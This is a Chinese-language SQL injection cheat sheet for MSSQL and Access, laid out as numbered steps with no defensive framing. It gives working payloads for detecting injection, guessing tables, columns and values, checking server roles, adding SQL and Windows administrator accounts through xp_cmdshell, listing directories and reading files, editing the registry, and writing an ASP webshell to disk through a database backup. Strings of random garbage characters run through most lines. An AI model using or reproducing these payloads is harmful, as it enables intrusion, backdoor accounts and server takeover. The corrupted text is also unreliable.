1.判断是否有注入;and 1=1 ;and 1=2 y�`<�*U;xL
2.初步判断是否是mssql ;and user>0 �f',Op�1�o
Zi�*2nv��'
3.注入参数是字符'and [查询条件] and ''=' C)um��9�}�
0.`/X66;V
4.搜索时没过滤参数的'and [查询条件] and '%25'=' )Kc<j!8-�[
~8q)^vm>f?
5.判断数据库系统 -�o��^7r@6
z X�g3[orF
;and (select count(*) from sysobjects)>0 mssql :(��/~�:^!
#3i3��G(mQ
;and (select count(*) from msysobjects)>0 access h9�t$Uz^�N
Lu?C-$a C
jZu[n)�u'C
Y+kf�Bvxyf
6.猜数据库 ;and (select Count(*) from [数据库名])>0 qk%�;on&�`
;,hwZZ��A�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 vLv@&l��MW
!y\'�EW3|G
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �]0Y4��U7W
cXA�
i k-
9.(1)猜字段的ascii值(access) ��52@C�9Q,
H`�*LBqDk�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �:t�z#v`3o
�+�5w))9@
(2)猜字段的ascii值(mssql) G!Op~p@Jm
0pZ4BZdT|
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 LoURC��$lS
x�sIY7Ss U
10.测试权限结构(mssql) �e)�,�q0%5
P}Gj�%�4/G
GB23\��Y�v
K?6�jXJseb
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��f/���U`
�/MIe(,>Uh
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- T`9lV2�x*P
�]�3�D0R;�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
oI?�3<M�^
�[@�&�m4 7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 9e<.lb^t�P
�hw�Pw]Ln/
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- F8nY���V��
vHgi�<@u
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ;0�Q���4<F
1�XrO�~W\=
;and 1=(select IS_MEMBER('db_owner'));-- h\$$Je�SV]
-z
ID ��x�
�D�@,6M#SK
Y[ j6u\y
11.添加mssql和系统的帐户 )%`c_FL@N=
oTEL?h�w�5
;exec master.dbo.sp_addlogin username;-- B~�'�vCu�E
;exec master.dbo.sp_password null,username,password;-- l3�{-z4�mw
WQx?[tW�(U
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- g!FuY�/%+�
��OyStq��i
;exec master.dbo.xp_cmdshell 'net user username password 0%32=k7O[
�^a/gBC82x
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ]RZ|u*l=�x
�g1�;:KzVv
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 7z%L*�z8�V
��$|�z�X|�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 2+�RUTOv/d
E�H-�sZA�v
��0����3L]
-zCH**�y%1
12.(1)遍历目录 '@a}H9�>�}
6gkV*|U,e�
;create table dirs(paths varchar(100), id int) F�Dv<\2+ c
,[��N%��Q#
;insert dirs exec master.dbo.xp_dirtree 'c:\' �L\��37xJo
b}2ED9HG\�
;and (select top 1 paths from dirs)>0 �J9�..P&c\
loEP�r5�bL
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) aKJ��wo�fD
�H/"-Z;�0{
uY{|sz�C^2
Z@yW bjE7Z
(2)遍历目录 g6��y�B6vk
'HO$C,��1]
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ww)<E`e�Gi
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 AKY�1o.>�z
~b(�i&DVK�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �.nO\kg�oK
g�GR"Z]DBk
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 [ie�I;OG�;
9,c(y�s�v"
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 :�)�8VdWg�
i9rN�9Mq?O
]q\b,)4�
e
/hp�Y f�]t
13.mssql中的存储过程 G5{��T�5#�
� hz{`���h
xp_regenumvalues 注册表根键, 子键 m\;R2"�H�%
�[�m-��>5H
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 oxr�#7Ei0d
?�K1/ <PE+
xp_regread 根键,子键,键值名 PG2:�~$�L0
!'Ak&�j1:`
;exec xp_regread HsxVZ.dS��
Upx �G@b��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 8aZ�=?_gvT
�} �F�E>|1
xp_regwrite 根键,子键, 值名, 值类型, 值 ��3W V"��U
x-XD.qh7Hr
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Q�Z!Y2Bz(4
�zh%#Y�_[R
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �j�*d��
yp
�S�Q@y�;|(
xp_regdeletevalue 根键,子键,值名 ]{�!�U@b��
5��C�uuG<0
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >�d@&2F�TO
W'els)WJ|x
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 T=<@]$��?�
�88Ey12$��
=pr�`��'��
�`K*Q5��n�
14.mssql的backup创建webshell Y$o<��6�[7
#akp��XdXs
use model $y�N{-��T"
w2U�s�!�<x
create table cmd(str image); �[v7F1@6�b
G, 44�v�a
insert into cmd(str) values (''); Gq+z�/Be��
�Y)��1PB+
backup database model to disk='c:\l.asp'; P�vz�cEV
@X%C>iYa�9
�>��q#�r�w
*l�YVY)��L
15.mssql内置函数 |�rY1U�S)S
A��m�vEf��
;and (select @@version)>0 获得Windows的版本号 iM�A�fJ-oN
�H� �
�>j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .>q��8W���
o�Onop-z�7
;and (select user_name())>0 爆当前系统的连接用户 8k2?�}�/+
#[,IsEpDO1
;and (select db_name())>0 得到当前连接的数据库 FFl!\y*�0z
N�c1"g�1JR
-�]��L6=��
�G�"kl�u�
16.简洁的webshell [\'%?BH(�^
l�yI�l-!|�
use model U���GD2��
{^
qcx���8
create table cmd(str image); �YO#M/�%^j
G��(�Lz�f(
insert into cmd(str) values (''); w�Z�G\>9~�
X]'{(?C�h�
backup database model to disk='g:\wwwtest\l.asp';
